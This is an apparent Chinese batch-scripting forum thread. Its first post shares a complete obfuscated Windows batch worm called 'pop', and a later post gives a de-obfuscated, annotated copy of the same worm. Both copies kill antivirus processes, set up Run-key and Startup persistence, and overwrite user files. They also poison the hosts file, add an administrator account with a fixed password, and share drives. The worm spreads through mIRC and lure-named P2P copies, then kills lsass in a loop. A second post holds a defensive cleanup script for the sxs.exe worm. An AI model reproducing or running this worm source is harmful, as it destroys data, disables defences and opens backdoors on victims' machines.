tianzizhi
『楼 主』:
一个pcl专业病毒代码,看懂它有哪些功能了吗?
别看眼花了 ^--^,
@echo off
:: Obfuscated batch worm "pop" exactly as posted (analysis annotations only,
:: the code is untouched). Two kinds of filler are mixed in: a line holding
:: only an undefined %name% expands to nothing inside a batch file and is a
:: no-op, and a line made of %random% expansions tries to run a number as a
:: command and merely prints a "not recognized" error. The real command names
:: are hidden behind variables (set pop=tskill, set pop1=echo, ...). A
:: de-obfuscated, annotated copy appears further down the thread (post #7).
%xyux%
%random%%random%%random%%random%%random%%random%%random%
%11bv%
%random%%random%%random%%random%%random%%random%%random%
%fxvb%
%random%%random%%random%%random%%random%%random%%random%
%qusr%
%random%%random%%random%%random%%random%%random%%random%
%6ed6%
%random%%random%%random%%random%%random%%random%%random%
%w7pb%
%random%%random%%random%%random%%random%%random%%random%
set a=pop
%kfon%
%yzri%
copy %0 %windir%\%a%.bat
:: Self-copy to %windir%\pop.bat (%0 is the path of the running script).
%u5gp%
%3yyx%
set pop=tskill
:: From here on %pop% is tskill (the XP/2003 Terminal Services kill tool):
:: terminates processes whose names match security-product patterns.
%pop% norton*
%pop% av*
%pop% fire*
%pop% anti*
%pop% spy*
%pop% bullguard
%pop% PersFw
%pop% KAV*
%pop% ZONEALARM
%pop% SAFEWEB
%pop% OUTPOST
%pop% nv*
%pop% nav*
%pop% F-*
%pop% ESAFE
%pop% cle
%pop% BLACKICE
%pop% def*
%4o3t%
%awxd%
%33u2%
%db62%
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\%a%.bat /f > nul
%w5d3%
%fbk1%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\%a%.bat /f > nul
:: Persistence: Run values named "pop" under HKLM and HKCU pointing at pop.bat.
%b2u7%
%suo3%
set pop1=echo
%elws%
%jdei%
%pop1% [windows] >> %windir%\win.ini
%yopv%
%pop1% run=%windir%\%a%.bat >> %windir%\win.ini
%pop1% load=%windir%\%a%.bat >> %windir%\win.ini
%pop1% [boot] >> %windir%\system.ini
%qkfs%
%pop1% shell=explorer.exe %a%.bat >> %windir%\system.ini
:: Legacy persistence: win.ini run=/load= and system.ini shell= lines. The
:: section headers are appended at the end of the files, so they may end up
:: as duplicate sections.
%lzvg%
%xjz3%
chcp 1252 > nul
%random%%pop%%random%%pop%
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\Autostart\%a%.bat" > nul
%r4yi%
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\%a%.bat" > nul
:: Copies into the All Users Startup folder, German and English locales. The
:: "Startmen黒Programme" text is mojibake: the character sits where the
:: German path would have "ü\" (see the note in post #7).
%random%%pop%%random%%pop%
%qehg%
net share ADMIN$
%82e1%
net share C$
net share IPC$
%5zbt%
net share c=c:
net share d=d:
:: Shares the C: and D: roots under plain names. "net share NAME" with no path
:: is documented as displaying a share, so whether the ADMIN$/C$/IPC$ lines
:: create anything is uncertain.
%dozn%
%h3i1%
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
:: Overwrites every matching file in the current directory with itself
:: (extensions are kept, so the document copies are destroyed, not runnable).
%h157%
set pop2=echo
%rmyg%
%dhg3%
%pop2% 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%pop2% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
:: Rewrites the hosts file so security-vendor, Microsoft and search-engine
:: names resolve to 127.0.0.1. The "google.com" line uses ">" again, so the
:: file is truncated there and only the bare-domain entries after it survive.
%qo3f%
%tfue%
%gfxo%
echo MsgBox "Infected with pop", 16, "pop" > v.vbs
start v.vbs
:: Calling card: a VBScript message box from a v.vbs written in the current directory.
%b7mv%
%be8h%
set x=%random%
%dhjx%
%ucoh%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v pop /t REG_SZ /d "%windir%\%a%.bat" /f > nul
:: Second copy under a random numeric name, started from HKCU Run value
:: "html"; RunServices (a Windows 9x/Me autostart key) points at pop.bat again.
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
:: Overwrites every .bat in system32 and in the Windows directory, then
:: c:\autoexec.bat. The current directory stays %windir% from here on.
%lqwu%
%v4uh%
%b63j%
set pop3=echo
copy %0 %windir%\ftppassword.bat
%pop3% [script] > irc.bat
%pop3% n1={ if ($nick == $me) { halt } >> irc.bat
%pop3% n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
%pop3% n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
%jyr3%
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
:: mIRC spreading attempt: replaces an existing script.ini with lines meant to
:: DCC-send the ftppassword.bat copy to other users. No event line is written,
:: so it is unclear whether mIRC would ever run it.
%dwdi%
%6a11%
md %programfiles%\pop\xxx\ > nul
md %programfiles%\pop\cracks\ > nul
copy %0 %programfiles%\pop\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\pop\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\pop\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\pop\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\pop\cracks\readme.txt
net share xxx&cracks=%programfiles%\pop > nul
:: Lure copies named like cracks/keygens. "&" is a command separator in
:: cmd.exe, so the last line runs "net share xxx" and then a command named
:: "cracks=..."; the share is most likely never created.
%5lp3%
%pop%%random%%pop%
%w8cd%
%j5wa%
net user root pwd /add
net localgroup "Administratoren" root /add
%lepf%
net localgroup "Administrators" root /add
%pop%%random%%random%%pop%
%pva7%
%8xds%
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
:: Adds local user "root" (password "pwd") to Administrators (German and
:: English group names), enables DCOM and writes restrictanonymous=0 as a
:: REG_SZ (the real value is a DWORD, so it may not take effect). Account
:: creation / group membership audit events (4720, 4732) are the detection hook.
%l3yt%
%euwr%
%rqt4%
%hpbw%
set popc=echo
%rhs5%
%popc% "<html>" > %windir%\hax0r.html
%popc% "<head>" >> %windir%\hax0r.html
%popc% "<title>Virus</title>" >> %windir%\hax0r.html
%popc% "</head>" >> %windir%\hax0r.html
%popc% "<body bgcolor="#000000">" >> %windir%\hax0r.html
%popc% "<p align="center"><b><font face="Arial" size="7" color="#FFFFFF">buh!</font></b></p>" >> %windir%\hax0r.html
%popc% "</body>" >> %windir%\hax0r.html
%popc% "</html>" >> %windir%\hax0r.html
%hjb7%
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\hax0r.html" /f > nul
:: Writes a "buh!" page (quotes echoed literally) and makes it the IE start page.
%a6y2%
%aff8%
%nlzq%
%flk1%
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
%pop%%random%%pop%%pop%%random%
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
%pop%%random%%pop%%pop%%random% > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d "%programfiles%\shared_folder" /f > nul
%4bde%
%t15p%
set popa=copy
%e5vt%
%eyuy%
%popa% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%popa% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%popa% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%popa% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%popa% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%5s3p%
%popa% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
:: Lure-named copies in Kazaa and Warez P2P shared folders; Kazaa's DownloadDir
:: is pointed at its own folder, presumably so the copies are offered to peers.
:: The unquoted "Program Files"/"Warez P2P Client" paths contain spaces, so
:: these copy lines may not even do what was intended.
%y8rl%
%ktxi%
%3bbc%
%3t67%
shutdown /r /f /t 23 /c "Infected with pop virus!!"
%y7kx%
%23cz%
shutdown /s /f /t 23 /c "Infected with pop virus!!"
:: Forced reboot in 23 s; the shutdown /s is issued while the first is pending
:: and is likely rejected.
%kfb3%
%ijzo%
%j5go%
%1r6t%
%f34c%
%ounv%
:bombing
chcp 1252 > nul
%random%%pop%%random%%pop%
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
%random%%pop%%random%%pop%
%q5cn%
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
:: Endless loop until the shutdown fires: random-named local copies, then
:: explorer.exe and lsass.exe are killed (killing lsass.exe normally forces a
:: restart on its own). Nothing below this line is ever reached.
%vu6x%
%ft65%
%dav%
%k7fj%
:: pop by pop
2006-12-18 08:57 |
tianzizhi
『第 2 楼』:
没人顶一下?我来.从中你可以学到一些很个性的批处理用法.下面再发一个有点搞笑的sxs专杀批处理,sxs病毒大家都知道吧,不知道?没中过? 你有点落伍了啊,有空补补知识吧.
[转贴] sxs.exe专杀 自己写的一个批处理源码
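@echo off
:: Cleanup batch for the "sxs.exe" USB/autorun worm (forum post, 2006).
:: Steps, each followed by a pause so the user can read the result:
::   1. kill the worm's processes (sxs.exe, soundmam.exe, svohost.exe),
::   2. remove its HKCU Run autostart values,
::   3. restore the Explorer "show hidden files" option the worm disables,
::   4. delete sxs.exe and autorun.inf from every drive C: .. Z:.
:: Needs taskkill and reg (Windows XP or later) and an administrator console
:: for the HKLM write; on older systems the processes must be ended by hand.
echo XXX_★訫☆龍(_少专用
echo 首先。。。俺应该先哀悼一下。。。你是多么的不幸,中了这种毒
pause
echo 其次。。。你应该高兴了。。。。。你是多么的幸运,有了★訫☆龍(_少的这个程序
pause
echo 以下为这个病毒的描述,如有错误,,,请。。。不要告诉别人,,呵呵
echo 通过u盘网络传播,中了后国内n多杀毒软件被破坏,在每盘根目录有sxs.exe,autorun.inf文件
echo 修改文件选项为不显示隐藏文件,,,注册表被改了
echo 一有u盘等移动存储设备连到本机立即复制本身过去。做得真tmd毒
echo ----------------------------------★訫☆龍(_少
echo QQ:502908008
echo blog:http://www.51.com/home.php?user=yxlong208
echo 开始我们的任务了~~~
pause
echo 程序将关闭相应进程,如果是瘟两千以下的系统请手动运行任务管理器关闭svohost.exe,sxs.exe进程,再继续本程序
echo 如果提示没有找到进程的话先81怕。。。。
pause
:: 1. Kill the worm's processes. /f forces termination; a "not found" message
::    only means that process was not running.
taskkill /f /im sxs.exe
taskkill /f /im soundmam.exe
taskkill /f /im svohost.exe
echo 病毒进程已经成功关闭
pause
echo 下一步,俺们将把病毒启动关闭
pause
:: 2. Remove the autostart values the worm writes under the current user's
::    Run key. /f suppresses the confirmation prompt.
for %%v in (soundmam svohost.exe sxs.exe) do (
  reg delete "hkcu\software\microsoft\windows\currentversion\run" /f /v %%v
)
echo 病毒启动项成功删除
pause
echo 恢复文件选项属性为显示所有隐藏文件
pause
:: 3. The worm changes the hidden-files option so Explorer cannot show hidden
::    files. reg add /f overwrites SHOWALL\CheckedValue in place (the original
::    deleted and re-added it); the per-user "Hidden" switch is set to 1
::    (= show hidden files) as well.
reg add "hklm\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
echo 报告老婆:恢复完毕
pause
echo 以下彻底删除病毒文件,有u盘的赶紧插上,等60.314159秒继续本程序(*_*)
pause
:: 4. Delete the worm's files from every drive that exists. The original
::    switched drives with "C:", "D:", ... which keeps that drive's current
::    directory, so "del /s" only walked a subtree; "cd /d X:\" starts at the
::    root. attrib /s strips the read-only/hidden/system bits recursively and
::    del /a matches files regardless of attributes (plain del skips hidden
::    and system files). A: and B: (floppy) are skipped. Like the original,
::    this also removes any legitimate autorun.inf found on a writable drive.
for %%d in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
  if exist %%d:\ (
    cd /d %%d:\
    attrib -r -a -h -s sxs.exe /s
    del /s /q /f /a sxs.exe
    attrib -r -a -h -s autorun.inf /s
    del /s /q /f /a autorun.inf
  )
)
echo 打完收工~ (*_*)
echo 呵呵`` 其实我还是小菜 ...当然我写不出这样的程序嘛~``呵呵``这个是我师傅写的`~`我借来用用哈``
echo 版权没有,尽情翻录。。。但是 如果有高手 当然也别见笑```大家玩玩 欢迎大家跟我来技术交流 QQ:502908008
pause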
2006-12-19 02:49 |
vkill
2006-12-19 03:50 |
ljs3509
2007-1-21 04:37 |
HUNRYBECKY
2007-1-21 08:59 |
dikex
『第 6 楼』:
一楼那个有很多垃圾代码来干扰别人,二楼那个连for命令也不会用
2007-1-21 09:10 |
dikex
『第 7 楼』:
发现有一些路径出现乱码了,C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\
应该是C:\Documents and Settings\All Users\Start Menu\Programs\吧,由此可以看出是国外的人写的
这个东西,vbs脚本、html语言都用上了,厉害啊
:: Cleaned-up copy of the sample in post #1: the filler lines were removed and
:: the deliberately confusing indirection variables (e.g. set pop=tskill) were
:: replaced with the real command names.
:: Artefacts this sample leaves behind, as a cleanup/detection checklist
:: (every item is visible in the lines below):
::   files     %windir%\pop.bat, %windir%\<random>.bat, %windir%\ftppassword.bat,
::             %windir%\hax0r.html, v.vbs, %programfiles%\pop\..., %programfiles%\shared_folder\...
::   registry  Run values "pop" (HKLM, HKCU) and "html" (HKCU), RunServices "pop",
::             IE "Start Page", Kazaa DownloadDir, Ole\EnableDCOM, Lsa\restrictanonymous
::   accounts  local user "root" in Administrators / Administratoren
::   network   ADMIN$, C$, IPC$, c, d shares; hosts file rewritten
::   config    win.ini run=/load=, system.ini shell=, mIRC script.ini
copy %0 %windir%\pop.bat
:: Copies itself (%0 = path of the running script) into the Windows directory as pop.bat.
tskill norton*
tskill av*
tskill fire*
tskill anti*
tskill spy*
tskill bullguard
tskill PersFw
tskill KAV*
tskill ZONEALARM
tskill SAFEWEB
tskill OUTPOST
tskill nv*
tskill nav*
tskill F-*
tskill ESAFE
tskill cle
tskill BLACKICE
tskill def*
:: Terminates processes whose names match common security-product patterns
:: (tskill is the XP/2003 Terminal Services kill tool; * is its wildcard).
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\pop.bat /f > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d %windir%\pop.bat /f > nul
echo [windows] >> %windir%\win.ini
echo run=%windir%\pop.bat >> %windir%\win.ini
echo load=%windir%\pop.bat >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe pop.bat >> %windir%\system.ini
chcp 1252 > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\pop.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pop.bat" > nul
:: Autostart via the Run keys (value "pop"), legacy win.ini run=/load= and
:: system.ini shell= entries, and the All Users Startup folder. The section
:: headers are appended at the end of the ini files, so they may end up as
:: duplicate sections. "Autostart" looks like the German Startup folder name
:: left over when the path was anglicised (see the note above this listing).
net share ADMIN$
net share C$
net share IPC$
net share c=c:
net share d=d:
:: Per the annotator: re-enables the default shares and shares the C: and D:
:: roots. Note that "net share NAME" with no path is documented as displaying
:: an existing share, so whether the first three lines create anything is
:: uncertain; the c=c: and d=d: lines do create shares.
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
:: Overwrites every .bat/.txt/.doc/.pdf/.jpg in the current directory with a
:: copy of itself (extensions are kept, so the document copies are destroyed
:: rather than made executable).
echo 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
:: Points security-vendor, Microsoft and search-engine names at 127.0.0.1 in
:: the hosts file. The "google.com" line uses ">" again, so the file is
:: truncated there and only the bare-domain entries from that line on survive.
echo MsgBox "Infected with pop", 16, "pop" > v.vbs
start v.vbs
:: Pops a VBScript message box ("Infected with pop") from a v.vbs written in
:: the current directory - the annotator reads it as showing off.
set x=%random%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v pop /t REG_SZ /d "%windir%\pop.bat" /f > nul
:: Second copy under a random numeric name in the Windows directory, started
:: from HKCU Run value "html"; the RunServices value "pop" (a Windows 9x/Me
:: autostart key) points at pop.bat again.
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
:: Overwrites every .bat in system32 and then in the Windows directory with
:: itself. The current directory stays %windir% from here on, so the relative
:: "irc.bat" below lands there.
copy %0 c:\autoexec.bat
:: Overwrites c:\autoexec.bat with itself.
copy %0 %windir%\ftppassword.bat
echo [script] > irc.bat
echo n1={ if ($nick == $me) { halt } >> irc.bat
echo n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
echo n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
:: mIRC spreading attempt: if mIRC's script.ini exists in either location it is
:: replaced with lines meant to DCC-send the ftppassword.bat copy to other
:: users. The annotator did not recognise the mIRC syntax; no event line is
:: written, so it is unclear whether mIRC would ever run it.
md %programfiles%\pop\xxx\ > nul
md %programfiles%\pop\cracks\ > nul
copy %0 %programfiles%\pop\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\pop\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\pop\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\pop\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\pop\cracks\readme.txt
net share xxx&cracks=%programfiles%\pop > nul
:: Lure copies named like cracks/keygens under %programfiles%\pop, meant to be
:: shared. "&" is a command separator in cmd.exe, so the last line runs
:: "net share xxx" and then a command named "cracks=...": the share is most
:: likely never created.
net user root pwd /add
net localgroup "Administratoren" root /add
net localgroup "Administrators" root /add
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
:: Adds a local user "root" (password "pwd") to the Administrators group (German
:: and English names), enables DCOM and sets restrictanonymous to 0 - written
:: as REG_SZ although the real value is a DWORD, so it may not take effect.
:: Account-creation / group-membership audit events (4720, 4732) are the
:: detection hook.
echo "<html>" > %windir%\hax0r.html
echo "<head>" >> %windir%\hax0r.html
echo "<title>Virus</title>" >> %windir%\hax0r.html
echo "</head>" >> %windir%\hax0r.html
echo "<body bgcolor="#000000">" >> %windir%\hax0r.html
echo "<p align="center"><b><font face="Arial" size="7" color="#FFFFFF">buh!</font></b></p>" >> %windir%\hax0r.html
echo "</body>" >> %windir%\hax0r.html
echo "</html>" >> %windir%\hax0r.html
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\hax0r.html" /f > nul
:: Writes a "buh!" page to %windir%\hax0r.html (the quotes are echoed literally)
:: and makes it the IE start page - another calling card.
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d "%programfiles%\shared_folder" /f > nul
copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
copy %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
copy %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
copy %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
copy %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
:: Drops lure-named copies into the Kazaa and Warez P2P shared folders and
:: points Kazaa's DownloadDir at its own folder, presumably so the copies are
:: offered to other peers - the annotator's "trap for the curious". The
:: unquoted paths with spaces mean several of these copy lines may not work.
shutdown /r /f /t 23 /c "Infected with pop virus!!"
shutdown /s /f /t 23 /c "Infected with pop virus!!"
:: Forced reboot in 23 s with an "Infected" message; the shutdown /s is issued
:: while the first is pending and is likely rejected.
:bombing
chcp 1252 > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Start Menu\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
:: Endless loop until the shutdown fires: random-named copies into the Startup
:: folders, the Desktop and C:\, then explorer.exe and lsass.exe are killed
